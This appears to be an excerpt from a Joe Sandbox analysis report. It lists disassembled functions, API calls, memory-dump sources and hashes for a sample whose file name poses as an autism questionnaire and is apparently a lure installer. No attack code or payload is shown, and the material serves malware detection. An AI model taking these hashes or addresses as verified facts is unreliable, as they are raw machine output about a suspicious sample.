                                                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                                                              • API String ID: 4170313675-2435364021
                                                                                              • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                                              • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                                                              • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                                              • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                                                                • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                                                • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                                                • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                                                • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                                                                • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                              • String ID: DeleteFile$MoveFile
                                                                                              • API String ID: 3947864702-139070271
                                                                                              • Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                                                              • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                                                              • Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                                                              • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                                                                • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                                                                • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                                                              • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                                                                • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                                                                • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                              • String ID: \UA$dUA
                                                                                              • API String ID: 503893064-3864016770
                                                                                              • Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                                                              • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                                                              • Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                                                              • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                                                                • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                                                                • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                                              • String ID:
                                                                                              • API String ID: 2255706666-0
                                                                                              • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                                              • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                                                              • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                                              • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32 ref: 005B95A3
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                                                              • SetWindowLongW.USER32 ref: 005B95FF
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$Visible
                                                                                              • String ID:
                                                                                              • API String ID: 2967648141-0
                                                                                              • Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                                                              • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                                                              • Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                                                              • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                                                              • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                                                              • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                                                              • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                                              • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                                                              • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                                              • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                                                              • GetPropW.USER32 ref: 0050E99A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2582817389-0
                                                                                              • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                                              • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                                                              • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                                              • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                              • String ID:
                                                                                              • API String ID: 215268677-0
                                                                                              • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                                              • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                                                              • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                                              • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 004F5551
                                                                                              • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                                                              • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                                                              • ReleaseDC.USER32 ref: 004F557F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsObjectReleaseSelectText
                                                                                              • String ID:
                                                                                              • API String ID: 2013942131-0
                                                                                              • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                                              • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                                                              • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                                              • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window
                                                                                              • String ID: /INITPROCWND=$%x $@
                                                                                              • API String ID: 2353593579-4169826103
                                                                                              • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                                              • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                                                              • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                                              • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                                                                • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocInitStringVariant
                                                                                              • String ID: FYC$kYC
                                                                                              • API String ID: 4010818693-1629163012
                                                                                              • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
